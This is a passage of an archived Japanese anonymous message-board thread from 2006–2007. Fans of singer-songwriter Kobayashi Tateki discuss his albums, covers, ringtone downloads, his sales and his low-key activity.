ピアノもいいね♪ 何回も聴いてるよ。

143 :NO MUSIC NO NAME:2006/07/06(木) 18:19:21 ID:0Fcr2QGP
犯罪者Qは何が歌いたくてレコーディングしてるんだろう??
犯罪者QのCDを買いたい奴なんかいるのかな???

144 :NO MUSIC NO NAME:2006/07/07(金) 02:44:18 ID:QxKiln2J
星空が映る海のようなイメージが
スーッと心を落ち着かせます。

おやすみ前の一曲にどうぞ☆.・°¨*

「誓い」 セルフカバーバージョン




145 :NO MUSIC NO NAME:2006/07/07(金) 13:15:22 ID:TccAQEZX
>同じ傾向のアーティスト
>・東京スカパラダイス オーケストラ
>・Smooth Ace
>・宇多田ヒカル
>・平井堅
>・中島美嘉

冗談だろHMV

146 :NO MUSIC NO NAME:2006/07/07(金) 23:42:01 ID:TccAQEZX
ゴールデン☆ベスト買いに行ったがタワレコに置いていなかったorz
ついでにすぐ隣に『ゴールデン☆ベスト/小林麻美』…一瞬手にとっちまったよOTL

147 :NO MUSIC NO NAME:2006/07/17(月) 21:26:35 ID:tCJQchrp
iTMSのオーディオブックの朗読とかしてほしいよ。
彼の朗読なら文学作品でも実用書でもいいのにな。

春に二度ほど、建樹氏が本を出版してる夢を見たんだけど
なぜか、漬け物の漬け方とかミシンの縫い方とかの写真入りの本だった・・・

148 :NO MUSIC NO NAME:2006/07/18(火) 00:12:47 ID:YbEX5r2f
はじめまして。初めて音楽板に来て小林建樹さんのスレを見つけたので仲間に入れてもらえたら嬉しいです。
建樹さんのCDはアルバムなら全て持ってますよ。近年リリースされた分はネットで取り寄せました。ブクオフの常連になりつつあるというのにはショックですね(・_・、)

149 :NO MUSIC NO NAME:2006/07/19(水) 00:39:47 ID:IQfEx/VM
夏になんですが、
http://d.recommuni.jp/skddj/200512

ここにあるクリスマスソング「this Christmas」って聴いてみたいんですけど・・・

150 :NO MUSIC NO NAME:2006/07/23(日) 00:28:28 ID:gGUEdsP8
>149
建樹のクリスマスソングと言うと、ファンクラブ用のCDで「Holy Night」てのは有ったけど
「this Christmas」て知らないな。この人、タイトル間違えてるんじゃない?

151 :NO MUSIC NO NAME:2006/07/30(日) 14:28:57 ID:1YC1qKzZ
この曲のタイトルからHoly Nightではないな〜と思った
未発表曲をデータ化したものかも

152 :NO MUSIC NO NAME:2006/08/07(月) 12:35:02 ID:lDcHzSBg
9日のオ−ラの泉に川嶋あいでるね〜

153 :NO MUSIC NO NAME:2006/08/07(月) 14:33:14 ID:5yOsHUcb
コバーンにも出てほしいような・・・ 出てほしくないような・・・

154 :NO MUSIC NO NAME:2006/08/09(水) 19:06:49 ID:nfc7JJpT
セルフカバーの「誓い」のコーラスは誰ですか?
iTunesで購入したのでわからんのです。
それにしてもすごいね、びっくりした。

155 :NO MUSIC NO NAME:2006/08/09(水) 23:07:30 ID:lWIjSHUg
>154
自分だよ。たぶん。
誰の名前も記載されてなかったし。
広沢も今のアルバムで同じように高温のコーラス、ちょっとだけ自分でしてた。

156 :NO MUSIC NO NAME:2006/08/09(水) 23:13:10 ID:nfc7JJpT
>>155
ありがとう!
タテキファンは昔から親切な人多いね。
広沢かぁ、、なんだかすごく懐かしい気がする。
久しぶりにタテキと聞き比べてみようかななんて。

157 :NO MUSIC NO NAME:2006/08/13(日) 00:39:30 ID:Ehx/TUOm
「祈り」を着うたフルでダウンロードしたいのですが探しても探してもないんです。
皆さん何か知らないですか?

158 :NO MUSIC NO NAME:2006/08/13(日) 16:28:59 ID:ouKs27dh
あたしも小林建樹さんの曲を着うたで欲しいんだけど、どなたか知ってる方教えてくださいm(._.)m

159 :NO MUSIC NO NAME:2006/08/14(月) 22:41:20 ID:exgXMi8x
>158
着うたフルじゃ無いけど、MUSIC100.jpってとこで
WINDOWとSHADOWの全曲がダウンロードできるよ。

>157
祈りの着うたは知らないです。ごめん。

160 :158:2006/08/16(水) 02:37:26 ID:9eMY/2Sn
>159さん
ありがとうございます!早速DLしましたよ(o^▽^o)

161 :NO MUSIC NO NAME:2006/08/17(木) 19:52:43 ID:oiEr8+YZ
松崎ナオの新譜に入っている「東京の空」って曲でギター・コーラスで建樹が参加しているよ。

162 :NO MUSIC NO NAME:2006/09/03(日) 01:58:24 ID:rhoxGg5W
なんで売れなかったんだろう、ってどっかに書いてたけど、
歌詞が暗い・重い(あくまで最近の音楽業界において)からでは?
Aqua Timezとか湘南乃風とかと比べると良く分かる。
人によっては一度聞いただけでは(何度聞いても)分からない歌詞かもしれないし。
表現が割と抽象的だから。

163 :NO MUSIC NO NAME:2006/09/04(月) 23:07:21 ID:KAL1A37Y
>162
どの曲のことですか??

164 :NO MUSIC NO NAME:2006/09/05(火) 23:54:31 ID:tQSPlWsG
>162
言ってることワカルヨ!
シングルの流れは結構ポップで良かったと思うけど
アルバム聴くとかなりへヴィだし。Rareとかさ。

165 :NO MUSIC NO NAME:2006/09/12(火) 02:24:03 ID:ijDJ6qgN
カバー楽しみだね
佐野元春かな?

166 :NO MUSIC NO NAME:2006/09/14(木) 05:49:19 ID:lnSUBVXZ
>>164だがそれがいい。

というか比べる対象がおかしくないか?
シカオあたりの男性ソロと比べないと…

自分としては毒があるけどポップ、みたいな男性アーティストが受け入れられ難いんだと思う。

167 :NO MUSIC NO NAME:2006/09/14(木) 07:36:40 ID:ubMTyquL
でもシカオは売れている。

168 :NO MUSIC NO NAME:2006/09/14(木) 09:31:40 ID:W2Ao+cTZ
小林建樹は分かりにくさが持ち味なんだから、それを消さないようにはしてほしい。
しかし、出したくなった時にCDを出せる程度には売れて欲しい。

この両方を思ったことがある人は少なからず居ると思う。

そういや「目覚め」って、誰への提供がボツになったんだろうか。


169 :NO MUSIC NO NAME:2006/09/14(木) 19:06:55 ID:dUEzledP
比較する必要なんてないよ
今はいい感じで音楽やってるんじゃない?
またちょっとしたら自分のアルバム出すでしょ

最初のメロディー、Replayからストレートな歌詞になったと思うけど
あんまり何のこと言ってるのか分りすぎると聴きにくい面もあるから
(視点が狭まれて)ほどよい加減がいいね。

170 :NO MUSIC NO NAME:2006/09/16(土) 17:19:41 ID:EXnTzRUm
でもまたなんでカバーアルバムなのか。

171 :NO MUSIC NO NAME:2006/10/01(日) 23:00:10 ID:WPZwulSL
なんでこんな隠居活動なのだろうか

172 :NO MUSIC NO NAME:2006/10/02(月) 22:31:50 ID:K+11X/EO
シャイなのは確か

173 :NO MUSIC NO NAME:2006/10/03(火) 23:18:16 ID:oTQYCyQg
うちのたてちゃんはオクテやからねぇ
おばぁちゃんはいつでも応援しちょるよ。またうたいに帰ってきんしゃい。

174 :NO MUSIC NO NAME:2006/10/11(水) 10:52:54 ID:/zgaCbzQ
満月が一番スキかな

175 :NO MUSIC NO NAME:2006/10/16(月) 09:44:54 ID:zxSX8b9s
あい嬢の空、風、波、夢いいね

176 :NO MUSIC NO NAME:2006/10/19(木) 21:14:38 ID:8nu+IkAy
ほっしゅ

177 :NO MUSIC NO NAME:2006/10/21(土) 04:23:26 ID:abJOL6Of
気持ちが沈んだときにRareを聴くのが好き。

178 :NO MUSIC NO NAME:2006/10/23(月) 20:34:11 ID:VtvIrjtH
東京は地震アブナイし、郊外にでも引っ越したんだろか
どうであろうと、才能をのばしてってくれたら それでいい

179 :NO MUSIC NO NAME:2006/10/31(火) 20:14:27 ID:quU6jznf
挫折の味を知っているかい?

180 :NO MUSIC NO NAME:2006/11/04(土) 14:30:15 ID:zW0q7qLf
12月のカシミア聴きたい

181 :NO MUSIC NO NAME:2006/11/07(火) 13:28:38 ID:h53i9Ei+
このスレも立て一年近く経つのに、200行かないなんてw。

182 :NO MUSIC NO NAME:2006/11/08(水) 12:33:31 ID:xO0tKjLM
最近オフィのBBSわけわからん
書き込みで占拠されてるね…

183 :NO MUSIC NO NAME:2006/11/08(水) 17:12:48 ID:qnYmv8Ba
MixiやBlogある時代、書き込み少ないのは最初からわかってるよ。
んなことより、あたらすぃ動きないかな

184 :NO MUSIC NO NAME:2006/11/23(木) 03:22:55 ID:elomth+x
祈りが好きだ

185 :NO MUSIC NO NAME:2006/11/23(木) 16:52:21 ID:O/CE3PaZ
懐かしい。802で番組やってるときによくみかけた!ミージックマンまでは好きでアルバム買ってたんだけど今は活動してないみたいだね

186 :NO MUSIC NO NAME:2006/11/24(金) 23:24:36 ID:JzPBfv5D
久しぶりにミュージックフリークスのレポを読んだんだけど、めちゃ懐かしくて、おもしろかった!
この番組、素の部分が出てて、最高によかったな。
聞かれてた方も聞けてなかった方も、今一度、読んでみてくださいまし。
http://www7.plala.or.jp/jmgh

187 :NO MUSIC NO NAME:2006/11/28(火) 01:48:54 ID:mIMW39GX
先日、イベントライブでステージにグランドピアノがあった

もちろん違うミュージシャンのライブのためになんだけど、
建ちゃんのピアノと歌声が激しく聴きたい衝動に駆られたよ

ワンマンが無理ならイベントに参加してくれないかなー
建ちゃん欠乏症だなぁ

188 :NO MUSIC NO NAME:2006/11/28(火) 18:47:37 ID:cHP0Rbqh
なんかね、知り合いのミュージシャンのサポートするために今までの流れがあったのかなーって思うと
ちょっともったいない気がする。
裏方だけで活動するのも結構大変そうだけど、どうせやるなら気心知れた関係者とじゃなく
新鮮な未知な場をふんでいった方が実りありそうだね。

189 :NO MUSIC NO NAME:2006/11/28(火) 22:22:02 ID:9s0GfxLW
髪型、みじかい方が絶対いいと思う。広いおでこが自然に出るから。
来月、見れるかな〜♪

190 :NO MUSIC NO NAME:2006/11/29(水) 09:30:42 ID:mYLCRLgj
ユニット組んだりしないのかな。岡村美央さんなんかとやったら面白そうなのに。

191 :NO MUSIC NO NAME:2006/11/29(水) 22:21:26 ID:tz9CVX1F
多分もうアルバム出したりすることはないと思う。流れからいって。
ただ、だとしたら何のために独立してWINDOW&SHADOWを出したんだろうか・・・
あの二枚がセールス・評価とも振るわなかったのがその後の流れを決めた気もする。

192 :NO MUSIC NO NAME:2006/11/30(木) 21:48:39 ID:h4HhN3oC
オフィBBS閉鎖か…

193 :NO MUSIC NO NAME:2006/12/02(土) 19:32:07 ID:YVo3aX7/
髪型、いい感じ(^-^)b

194 :NO MUSIC NO NAME:2006/12/05(火) 00:00:57 ID:LnurpYnT
これだよね。竹仲絵里ライブサポートって(違ってたらスイマセン)

★Hit Tune Vol.2
[出演]竹仲絵里/ナナムジカ/berry/山田タマル [オープニングアクト]辻香織
全席自由(整理番号付、ドリンク代別途要) 問合せ先:[キャンディープロモーション]082-249-8334

■公演日:2006年12月18日(月) ■開演:6:30PM ■開場:5:45PM
■会場: 広島クラブクアトロ    ■席種・料金: 全自由・4000  ■Pコード:244-565

*FM AICHI 37th ANNIVERSARY Sweet Crying X'mas Party!
アーティスト   竹仲絵里/山田タマル
会   場    ell.FITS ALL (名古屋市中区) www.ell.co.jp/
公 演 日 時    2006/12/20 (水) 19:00 (18:30 開場)
         オールスタンディング\2,800
一般発売プレイガイド  ダイレクトセンター (052-320-9000)
            チケットぴあ (0570-02-9999+店頭 Pコード:243-913)
            ローソンチケット (0570-084-004 Lコード:46825)

会場近くのお時間ある方は足運んでみてもいいかも

195 :NO MUSIC NO NAME:2006/12/05(火) 17:04:02 ID:ZKv0LiXE
広島クラブクアトロって猫背のカウントダウンライブしたとこだね、確か。
異様にセクシーな告白を聴いた気がする。なつかしいな〜 猫背はまだ健在なのだろうか

196 :NO MUSIC NO NAME:2006/12/07(木) 12:51:09 ID:TVxscU1m
この前中古で窓と影を買ったけど、結構よかった。
というか最近よく聴いてる。

197 :NO MUSIC NO NAME:2006/12/07(木) 23:01:31 ID:vrT+yxgt
WINDOWは、アコースティックで聴き心地好くて、
実験してて作り込んでるSHADOWも聴き応え 充分って感じだ。
本来のペースで活動できるようになってほしい。裏方でもいい、ずっと聴いていたい。

198 :NO MUSIC NO NAME:2006/12/15(金) 11:49:54 ID:kFfZjLmr
WINDOWとSHADOW聴いてから建樹が遠のきました。
初期の曖昧な引力らへんの路線に戻って欲しいのは自分だけ?

199 :NO MUSIC NO NAME:2006/12/21(木) 01:48:46 ID:oofKfiSZ
最近はブラジル音楽とかジャズが好きで影響受けとるみたいだから
しばらくはないだろうね。自分で最初の頃は青くて衝動的なとこがあってあまり好
きではないみたいなこと言ってたような…。

200 :NO MUSIC NO NAME:2006/12/23(土) 15:18:00 ID:QqPoameg
age

201 :NO MUSIC NO NAME:2006/12/26(火) 00:19:24 ID:PvMs+o3U
JOYのリアルタイムリクエストに、
それは愛ではありません がエントリーしてるね。
ttp://joysound.com/ex/index.htm

202 :NO MUSIC NO NAME:2006/12/26(火) 22:38:02 ID:7MzcqRtQ
ほす

203 :NO MUSIC NO NAME:2006/12/30(土) 20:19:57 ID:P7QpQnTw
好き

204 :NO MUSIC NO NAME:2006/12/30(土) 20:45:13 ID:t9rebBZv
今年の紅白、平原綾香「誓い」が一番認知度あるんじゃないか

205 :NO MUSIC NO NAME:2007/01/03(水) 15:06:53 ID:OG+CC5Wz
今年は、どこのファンサイトも掲示板閉鎖してるから
建樹の書きこみないですね・・・

206 :NO MUSIC NO NAME:2007/01/07(日) 18:54:06 ID:2i32SRrB
今日ブックオフで「祈り」のシングル見つけて発作的に買った、
んで懐かしくて、検索してここに来た。
「誓い」も建樹さんの曲だったんだね、知らなかったよ、来てよかった。

5年ぶりぐらいに聞いてみると記憶と違って声が細高くてびっくりした、
上のレスに歌い方の幅があるってあるし、他の曲も聞いてみるよ。

「祈り」は楽譜買うくらい好きだったんで、いつか弾き語るのを夢に
練習します。



207 :NO MUSIC NO NAME:2007/01/07(日) 22:56:15 ID:qnPQeUw3
>206 がんばれー

208 :NO MUSIC NO NAME:2007/01/26(金) 18:16:14 ID:63IystEb
誕生日おめでとう!

209 :NO MUSIC NO NAME:2007/02/01(木) 21:58:22 ID:FPVdfxGs
しばらく建樹聴かずに、中村一義やら斉藤和義やらエレカシにハマッてました。
飽きてきて、今日何か月かぶりに建樹聴きました。MUSIC MANだったけど、やっぱ建樹いいわ〜(ノд`。)

今彼は何をなさっておられるのか…サポートとかもいいけどやっぱり建樹の歌が聴きたい!表に出てきて欲しいo(TдT=TдT)o


210 :NO MUSIC NO NAME:2007/02/14(水) 22:22:59 ID:evENLdR6
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
広沢タダシ Part5 [インディーズ]

ふはは、そうかそうか、広沢タダシ自分も好きだよww
やっぱ、好きな音楽が一緒だと好きなアーティストも似ちゃうのね。

41 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)